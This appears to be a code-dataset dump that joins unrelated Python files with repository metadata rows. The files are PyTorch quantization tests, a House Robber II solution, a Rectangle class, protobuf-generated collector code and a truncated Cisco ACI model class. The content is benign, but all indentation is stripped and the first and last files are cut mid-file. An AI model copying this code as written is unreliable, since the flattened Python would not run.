scale_base = to_tensor(scale, 'cuda')
zero_point_base = to_tensor(zero_point, 'cuda')
self._test_learnable_backward_per_channel(
X_base, 'cuda', scale_base, zero_point_base, axis)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_forward_per_channel(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantizePerChannel op.
"""
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(
X, scale, zero_point, axis, quant_min, quant_max).to(device)
Y_prime = _LearnableFakeQuantizePerChannelOp.apply(
X, scale, zero_point, axis, quant_min, quant_max, 1.).to(device)
tolerance = 1e-2
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected _LearnableFakeQuantizePerChannelOp to have results match the reference forward function")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_backward_per_channel(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantizePerChannel op.
"""
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device).float()
X.requires_grad_()
scale = to_tensor(scale, device).float()
scale.requires_grad_()
zero_point = torch.tensor(zero_point).to(device).float()
zero_point.requires_grad_()
Y_prime = _LearnableFakeQuantizePerChannelOp.apply(
X, scale, zero_point, axis, quant_min, quant_max, 1.).to(device)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_channel_affine_grad_reference(
dout, X, scale, zero_point, axis, quant_min, quant_max, device)
Y_prime.backward(dout)
dX_expected = dX.to(device).detach()
dX_actual = X.to(device).grad.detach()
dScale_expected = dScale.to(device).detach()
dScale_actual = scale.to(device).grad.detach()
dZeroPoint_expected = dZeroPoint.to(device).detach()
dZeroPoint_actual = zero_point.to(device).grad.detach()
tolerance = 1e-2
self.assertTrue(
torch.allclose(dX_expected, dX_actual, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(dScale_expected, dScale_actual, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(dZeroPoint_expected, dZeroPoint_actual, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_numerical_consistency_per_channel(self, device, X):
r"""Comparing numerical consistency between CPU quantize/dequantize op and the CPU fake quantize op
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
# quantize_linear and dequantize are only implemented in CPU
Y = torch.dequantize(torch.quantize_per_channel(X.cpu(), scale.cpu(), zero_point.cpu(), axis, torch_type))
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.qint8)))
def test_fq_module(self, device, X):
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
fq_module = FakeQuantize(default_per_channel_weight_observer, quant_min, quant_max, ch_axis=axis).to(device)
Y_prime = fq_module(X)
assert fq_module.scale is not None
assert fq_module.zero_point is not None
Y = _fake_quantize_per_channel_affine_reference(X, fq_module.scale,
fq_module.zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y.cpu().detach().numpy(), Y_prime.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
# Test backward
dout = torch.rand(X.shape, dtype=torch.float, device=device)
Y_prime.backward(dout)
dX = _fake_quantize_per_channel_affine_grad_reference(dout, X, fq_module.scale,
fq_module.zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(dX.cpu().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def test_fq_serializable(self):
observer = default_per_channel_weight_observer
quant_min = -128
quant_max = 127
fq_module = FakeQuantize(observer, quant_min, quant_max)
X = torch.tensor([[-5, -3.5, -2, 0, 3, 5, 7], [1, 3, 2, 5, 6.5, 8, 10]], dtype=torch.float32)
y_ref = fq_module(X)
state_dict = fq_module.state_dict()
self.assertEqual(state_dict['scale'], [0.054902, 0.078431])
self.assertEqual(state_dict['zero_point'], [0, 0])
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
def _get_buffer_ids(module):
"""
Object addresses stay constant if and only if all modifications are in-place
"""
return [id(v) for k, v in module._buffers.items()]
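# Illustrative sketch (not part of the original test suite): the in-place invariant that
# _get_buffer_ids relies on. An in-place op keeps a buffer's object id stable, while
# rebinding the name to a freshly allocated tensor changes it:
#
#     buf = torch.zeros(3)
#     before = id(buf)
#     buf.add_(1.0)     # in-place update: id(buf) == before
#     buf = buf + 1.0   # rebinding to a new tensor: id(buf) != before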
class TestDistributed(QuantizationTestCase):
def test_observers_preserve_buffers(self):
"""
Tests that observers only modify buffers in place. Note: this is important
because nn.DataParallel depends on this assumption to work correctly.
However, DataParallel does not expose IDs of the replicas, so we test it
without DataParallel in order to easily access the object IDs.
"""
observer_types = [
torch.quantization.MinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MovingAverageMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MinMaxDynamicQuantObserver.with_args(dtype=torch.qint8),
torch.quantization.PerChannelMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MovingAveragePerChannelMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.HistogramObserver.with_args(dtype=torch.qint8),
torch.quantization.RecordingObserver.with_args(dtype=torch.qint8),
torch.quantization.PlaceholderObserver.with_args(dtype=torch.float16),
]
for observer_type in observer_types:
observer = observer_type()
buffer_ids_before = _get_buffer_ids(observer)
for _i in range(5):
inputs = torch.rand((4, 4, 4))
observer(inputs)
buffer_ids_after = _get_buffer_ids(observer)
self.assertEqual(
buffer_ids_before,
buffer_ids_after,
msg="{}: Buffers must be modified in place".format(str(observer)))
def test_fake_quant_preserves_buffers(self):
"""
Tests that fake quant only modifies buffers in place. Note: this is important
because nn.DataParallel depends on this assumption to work correctly.
However, DataParallel does not expose IDs of the replicas, so we test it
without DataParallel in order to easily access the object IDs.
"""
model = torch.quantization.FakeQuantize()
buffer_ids_before = _get_buffer_ids(model)
for _i in range(5):
inputs = torch.rand((4, 4, 4))
model(inputs)
model.apply(torch.quantization.enable_fake_quant)
model.apply(torch.quantization.disable_fake_quant)
model.apply(torch.quantization.enable_observer)
model.apply(torch.quantization.disable_observer)
buffer_ids_after = _get_buffer_ids(model)
self.assertEqual(
buffer_ids_before,
buffer_ids_after,
msg="FakeQuant: Buffers must be modified in place")
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_qat_data_parallel(self):
"""
Tests that doing QAT in nn.DataParallel does not crash.
"""
if 'fbgemm' not in torch.backends.quantized.supported_engines:
return
with override_quantized_engine('fbgemm'):
device = torch.device('cuda')
model = nn.Sequential(
torch.quantization.QuantStub(),
nn.Conv2d(3, 1, 1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
nn.Conv2d(1, 2, 3, stride=2, padding=1, bias=False),
nn.BatchNorm2d(2),
nn.AvgPool2d(14),
nn.Sigmoid(),
torch.quantization.DeQuantStub(),
)
torch.quantization.fuse_modules(model, [['1', '2', '3'], ['4', '5']], inplace=True)
model.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')
torch.quantization.prepare_qat(model, inplace=True)
model = nn.DataParallel(model, device_ids=[0, 1])
model.to(device)
model.train()
for epoch in range(3):
inputs = torch.rand(2, 3, 28, 28).to(device)
model(inputs)
if epoch >= 1:
model.apply(torch.quantization.disable_observer)
if epoch >= 2:
model.apply(torch.nn.intrinsic.qat.freeze_bn_stats)
quant_model = copy.deepcopy(model.module)
quant_model = torch.quantization.convert(quant_model.eval().cpu(), inplace=False)
with torch.no_grad():
out = quant_model(torch.rand(1, 3, 28, 28))
def test_qat_convbn_fused_syncbn_replacement(self):
"""
Tests that SyncBatchNorm replacement works for fused ConvBN.
"""
if 'fbgemm' not in torch.backends.quantized.supported_engines:
return
with override_quantized_engine('fbgemm'):
# create conv-bn
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv = nn.Conv2d(4, 1, 3, padding=1)
self.bn = nn.BatchNorm2d(1)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
model = Model()
# fuse it
fused_model = torch.quantization.fuse_modules(
model,
[['conv', 'bn']],
)
# convert to QAT
fused_model.qconfig = torch.quantization.get_default_qconfig('fbgemm')
torch.quantization.prepare_qat(fused_model, inplace=True)
# replace with DDP
fused_model = nn.SyncBatchNorm.convert_sync_batchnorm(fused_model)
self.assertTrue(
isinstance(fused_model.conv.bn, nn.SyncBatchNorm),
"Expected BN to be converted to SyncBN")
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@override_qengines
def test_device_affinity(self):
"""
Tests that converting a model to QAT respects device affinity
"""
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv = nn.Conv2d(1, 1, 1)
self.bn = nn.BatchNorm2d(1)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
model = Model()
model.qconfig = torch.quantization.get_default_qat_qconfig(torch.backends.quantized.engine)
device = torch.device('cuda:0')
model.to(device)
torch.quantization.prepare_qat(model, inplace=True)
model_devices = {p.device for p in model.parameters()} | \
{p.device for p in model.buffers()}
self.assertEqual(len(model_devices), 1)
model_device = next(iter(model_devices))
self.assertEqual(model_device, device)
# ensure that running an input on CUDA works without any needed changes
input = torch.randn(4, 1, 4, 4, device=device)
model(input)
| [
"[email protected]"
] | |
576e761485b9b3fbcdc1ce8d9b9405d34e242c90 | a1ad2715e306fd4e7eaeda5348e00e1a363e7884 | /leetcode/concepts.py/houserobber2.py | d7ea4c294868b76061a7f6960164e761560f91cc | [] | no_license | MayankMaheshwar/DS-and-Algo-solving | cef54a800b3e8a070a707f97b4f30fccaa17d5c6 | ac6ea8f880920242a55d40c747368d68cb6f7534 | refs/heads/master | 2022-12-07T07:55:08.380505 | 2022-12-05T09:32:14 | 2022-12-05T09:32:14 | 237,103,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | def robberse(self, nums):
def simple_rob(nums, i, j):
rob, not_rob = 0, 0
for idx in range(i, j):
num = nums[idx]
rob, not_rob = not_rob + num, max(rob, not_rob)
return max(rob, not_rob)
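    # House Robber II: the houses form a circle, so house 0 and house n-1 are adjacent
    # and can never both be robbed. Run the linear helper twice -- once skipping the
    # first house (indices 1..n-1) and once skipping the last (indices 0..n-2) --
    # and take the larger result.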
if not nums:
return 0
elif len(nums) == 1:
return nums[0]
else:
n = len(nums)
return max(simple_rob(nums, 1, n), simple_rob(nums, 0, n-1)) | [
"[email protected]"
] | |
196a8d28085738fdda38ea2f078b8fb542ec2300 | 189c99816118ac6334fb65f1ef611c71eb756ead | /0x08-python-more_classes/6-rectangle.py | 76a2c927a7745e18c819895c16ccb3f69c5e9f0f | [] | no_license | MadmanSilver/holbertonschool-higher_level_programming | 4d51e308636ccc37271869dd830f700d8201948e | 09e47b319d9bd674519b13263a74822198d5932c | refs/heads/master | 2022-12-18T23:40:37.862157 | 2020-09-25T02:41:01 | 2020-09-25T02:41:01 | 259,349,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | #!/usr/bin/python3
""" Contains the Rectangle class. """
class Rectangle:
""" Defines a rectangle. """
number_of_instances = 0
def __init__(self, width=0, height=0):
""" Sets up the rectangle instance. """
self.width = width
self.height = height
Rectangle.number_of_instances += 1
@property
def width(self):
""" Width of the rectangle. """
return self.__width
@width.setter
def width(self, value):
""" Sets the width of the rectangle. """
if type(value) is not int:
raise TypeError("width must be an integer")
if value < 0:
raise ValueError("width must be >= 0")
self.__width = value
@property
def height(self):
""" Height of the rectangle. """
return self.__height
@height.setter
def height(self, value):
""" Sets the height of the rectangle. """
if type(value) is not int:
raise TypeError("height must be an integer")
if value < 0:
raise ValueError("height must be >= 0")
self.__height = value
def area(self):
""" Calculates the area of the rectangle. """
return self.width * self.height
def perimeter(self):
""" Calculates the perimeter of the rectangle. """
if self.width == 0 or self.height == 0:
return 0
return self.width * 2 + self.height * 2
def __str__(self):
""" Returns a string representation of the rectangle. """
res = ""
if self.width == 0:
return res
for y in range(self.height):
res += "#" * self.width
if y + 1 != self.height:
res += "\n"
return res
def __repr__(self):
""" Returns a string that can be used with eval to duplicate. """
return "Rectangle({}, {})".format(self.width, self.height)
def __del__(self):
""" Prints a message when rectangle is deleted. """
print("Bye rectangle...")
Rectangle.number_of_instances -= 1
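
if __name__ == "__main__":
    # Quick usage sketch (hedged addition, not part of the original task file);
    # guarded by __main__ so importing the module stays side-effect free.
    my_rect = Rectangle(3, 2)
    print(my_rect)              # two rows of '###'
    print(my_rect.area())       # 6
    print(my_rect.perimeter())  # 10
    print(repr(my_rect))        # Rectangle(3, 2)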
| [
"[email protected]"
] | |
abd67ca206bbbefe8db51c4120f1011c9b6a16a1 | bc441bb06b8948288f110af63feda4e798f30225 | /webshell_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py | 4cb5fc609cbe47718128bc79d754b117d6e91800 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 9,177 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alias_metric_with_one_original_metric.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from webshell_sdk.model.collector_service import metric_pb2 as webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alias_metric_with_one_original_metric.proto',
package='collector_service',
syntax='proto3',
serialized_options=_b('ZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_service'),
serialized_pb=_b('\n+alias_metric_with_one_original_metric.proto\x12\x11\x63ollector_service\x1a\x31webshell_sdk/model/collector_service/metric.proto\"\xb5\x03\n*CollectorAliasMetricWithOneOiriginalMetric\x12\x15\n\rcalculateOnly\x18\x01 \x01(\x08\x12;\n\x0f\x63ollectorMetric\x18\x02 \x01(\x0b\x32\".collector_service.CollectorMetric\x12T\n\rdependMetrics\x18\x03 \x03(\x0b\x32=.collector_service.CollectorAliasMetricWithOneOiriginalMetric\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\x0c\n\x04name\x18\x05 \x01(\t\x12P\n\x04\x64ims\x18\x06 \x03(\x0b\x32\x42.collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims\x12\x0f\n\x07version\x18\x07 \x01(\x05\x12\x14\n\x0cisCalculated\x18\x08 \x01(\x08\x12\x12\n\nexpression\x18\t \x01(\t\x1a.\n\x04\x44ims\x12\x0f\n\x07\x64imName\x18\x01 \x01(\t\x12\x15\n\roriginDimName\x18\x02 \x01(\tBMZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_serviceb\x06proto3')
,
dependencies=[webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2.DESCRIPTOR,])
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS = _descriptor.Descriptor(
name='Dims',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.dimName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='originDimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.originDimName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=509,
serialized_end=555,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC = _descriptor.Descriptor(
name='CollectorAliasMetricWithOneOiriginalMetric',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='calculateOnly', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.calculateOnly', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collectorMetric', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.collectorMetric', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dependMetrics', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dependMetrics', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dims', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dims', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.version', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCalculated', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.isCalculated', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='expression', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.expression', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=118,
serialized_end=555,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS.containing_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['collectorMetric'].message_type = webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2._COLLECTORMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dependMetrics'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dims'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS
DESCRIPTOR.message_types_by_name['CollectorAliasMetricWithOneOiriginalMetric'] = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CollectorAliasMetricWithOneOiriginalMetric = _reflection.GeneratedProtocolMessageType('CollectorAliasMetricWithOneOiriginalMetric', (_message.Message,), {
'Dims' : _reflection.GeneratedProtocolMessageType('Dims', (_message.Message,), {
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims)
})
,
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric)
})
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric)
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric.Dims)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
181a25b998b188559a7c17997e8ce525d68a3cf4 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/fv/aeppconfissues.py | c23c2662a913b2fdb31f332c39cb53a959687641 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 6,453 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AEpPConfIssues(Mo):
meta = ClassMeta("cobra.model.fv.AEpPConfIssues")
meta.isAbstract = True
meta.moClassName = "fvAEpPConfIssues"
meta.moClassName = "fvAEpPConfIssues"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of EpP Configuration Issues"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.fv.RsStPathAtt")
meta.parentClasses.add("cobra.model.fv.AEPgCont")
meta.parentClasses.add("cobra.model.fv.ExtStPathAtt")
meta.parentClasses.add("cobra.model.fv.RsStGrpAtt")
meta.parentClasses.add("cobra.model.fv.RsNodePortAtt")
meta.parentClasses.add("cobra.model.fv.InBEpP")
meta.parentClasses.add("cobra.model.vz.ToEPgAny")
meta.parentClasses.add("cobra.model.vz.ToEPg")
meta.parentClasses.add("cobra.model.fv.RtdEpP")
meta.parentClasses.add("cobra.model.fv.Locale")
meta.parentClasses.add("cobra.model.fv.AttEntityPathAtt")
meta.parentClasses.add("cobra.model.fv.StPathAtt")
meta.parentClasses.add("cobra.model.fv.DyPathAtt")
meta.parentClasses.add("cobra.model.fv.ConfigState")
meta.parentClasses.add("cobra.model.fv.EpP")
meta.parentClasses.add("cobra.model.fv.OoBEpP")
meta.parentClasses.add("cobra.model.fv.BrEpP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.fv.AConfIssues")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.pol.AConfIssues")
meta.concreteSubClasses.add("cobra.model.fv.NwIssues")
meta.concreteSubClasses.add("cobra.model.fv.StorageIssues")
meta.concreteSubClasses.add("cobra.model.fv.CompIssues")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "configSt", "configSt", 4993, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applied"
prop._addConstant("applied", "applied", 2)
prop._addConstant("applying", "applying", 1)
prop._addConstant("failed-to-apply", "failed-to-apply", 3)
prop._addConstant("not-applied", "not-applied", 0)
prop._addConstant("temp-failed-to-apply", "temp-failed-to-apply", 4)
meta.props.add("configSt", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epgPKey", "epgPKey", 1831, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("epgPKey", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "temporaryError", "temporaryError", 16106, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
